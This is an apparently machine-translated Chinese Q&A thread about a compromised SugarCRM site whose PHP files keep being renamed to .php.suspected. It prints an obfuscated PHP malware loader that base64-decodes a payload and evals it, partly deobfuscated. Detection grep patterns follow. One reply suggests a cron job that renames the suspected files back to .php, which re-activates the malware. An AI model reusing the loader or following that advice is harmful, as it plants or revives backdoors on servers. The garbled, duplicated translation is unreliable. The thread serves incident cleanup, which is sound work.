php文件自动重命名为php.com
自过去4天以来,我们的生产服务器(AWS EC2实例)上只针对一个站点,即SugarCRM,面临着奇怪的问题 问题是/home/site\u folder/public\u html/include/MassUpdate.php文件将自动重命名为/home/site\u folder/public\u html/include/MassUpdate.php。可疑 这种情况一天发生2-3次,间隔3-4小时。此问题仅在特定站点的情况下发生,即使对于同一站点的暂存副本也不会发生。我甚至检查了两个网站的文件代码,都是一样的 我们通过谷歌搜索发现,此类问题主要发生在Wordpress网站上,可能是因为受到攻击。但是我们检查了服务器是否受到攻击,没有任何攻击。此外,服务器上没有运行病毒/恶意软件扫描 我们该怎么办 更新: 经历了这些之后,我们发现了一些东西 我们为.*strlen.*isset'/home/username/public_html/执行了php文件自动重命名为php.com,php,linux,apache,amazon-ec2,sugarcrm,Php,Linux,Apache,Amazon Ec2,Sugarcrm,自过去4天以来,我们的生产服务器(AWS EC2实例)上只针对一个站点,即SugarCRM,面临着奇怪的问题 问题是/home/site\u folder/public\u html/include/MassUpdate.php文件将自动重命名为/home/site\u folder/public\u html/include/MassUpdate.php。可疑 这种情况一天发生2-3次,间隔3-4小时。此问题仅在特定站点的情况下发生,即使对于同一站点的暂存副本也不会发生。我甚至检查了两个网站的
egrep-Rl'函数.*for.*strlen.*isset'/home/username/public\u html/
,发现只有很少的文件具有以下示例代码
<?php
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
$ixo="base64_decode";return $ixo($ggy);}
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
eval(flnftovr($s, $koicev));?>
似乎有些恶意软件,我们如何永久删除它
谢谢它有点模糊,但我已经消除了模糊。函数flnftovr将字符串和数组作为参数。它使用以下公式创建一个新字符串$ggy
isset($array[$string[$i]]) ? $array[$string[$i]] : $string[$i];}
然后它将base64_decode预先写入字符串
字符串是$s,数组是$koicev。然后,它评估此操作的结果。因此最终会创建一个字符串:
base64_decode(QGluaV9zZXQoJ2Vycm9yX2xvZycsIE5VTEwpOwpAaW5pX3NldCgnbG9nX2Vycm9ycycsIDApOwpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgMCk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmlmKGlzc2V0KCRfU0VSVkVSKfZW5jb2RlKHNlcmlhbGl6ZSgkcmVzKSk7Cn0=)
因此,在服务器上实际运行的是:
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
if(isset($_SERVER)
encode(serialize($res));
}
如果您没有创建此应用程序,并且怀疑您的站点已被黑客攻击,我建议您删除服务器,并为服务器上运行的任何应用程序创建一个新安装。发布此答案,可能会对其他人有所帮助
#将_文件_name.php.index重命名为_文件_name.php
mv//your\u file\u name.php.php//your\u file\u name.php
*/10****指向cron\u文件.sh的路径
您将获得大量关于在谷歌上创建cron的文档。将
.php
文件重命名为.php。怀疑的事件今天仍在发生。以下命令不应出现问题:
find <web site root> -name '*.suspected' -print
find <web site root> -name '.*.ico' -print
find-name'*.疑似'-print
查找-名称“.*.ico”-打印
在我的情况下,可以使用以下命令定位受感染的文件:
cd <web site root>
egrep -Rl '\$GLOBALS.*\\x'
egrep -Rl -Ezo '/\*(\w+)\*/\s*@include\s*[^;]+;\s*/\*'
egrep -Rl -E '^.+(\$_COOKIE|\$_POST).+eval.+$'
cd
egrep-Rl'\$GLOBALS.*\\x'
egrep-Rl-Ezo'/\*(\w+)\*/\s*@include\s*[^;]+\s*/\*'
egrep-Rl-E'^.+(\$\u COOKIE \$\u POST)。+eval.+$'
我已经准备了一个关于这个问题以及如何处理它的详细描述。将php文件重命名为php。可疑的通常是由黑客的脚本设计和完成的。他们更改文件扩展名,给人的印象是该文件已被某些反恶意软件检查过,是安全的,无法执行。但事实上,事实并非如此。只要他们想调用脚本,他们就会将扩展名更改为“php”,然后将扩展名更改回“可疑”。
你可以在网上看到
也许这篇文章很老了,但主题仍然存在。特别是根据。我在我客户的WordPress子目录中发现了一些“可疑”文件(例如wp内容)如果这是用于生产应用程序,我建议您立即联系安全专家。在更改文件名之前,是否可以检查web服务器日志以查看对该文件的任何奇怪请求?您可以尝试从CLIfind运行此命令吗-名称“*.php”-exec grep-H”eval({}\;
来自公共html/级别。这将搜索所有可能由调用eval
的黑客创建的php文件。注意,您可能会发现一些误报。我建议您也禁用crm的任何插件,因为插件是黑客最流行的攻击向量。也没有病毒/恶意软件扫描在服务器上运行。
为什么不?这应该运行。始终。如果你不锁门,不要惊讶地发现邻居的猫喝了你所有的牛奶,抽了你的烟:-pjust create cronjob#!/bin/bash cd/home/username/public_html find/home/username/public_html-键入f-name'*.可疑';读f时输入mv“$f”“${f%.可疑}”;done@JamesMaynard没错,这就是我使用的解决方案。我真的不知道cron@HidaytRahman您应该在谷歌上搜索它,或者让服务器管理员对此进行调查。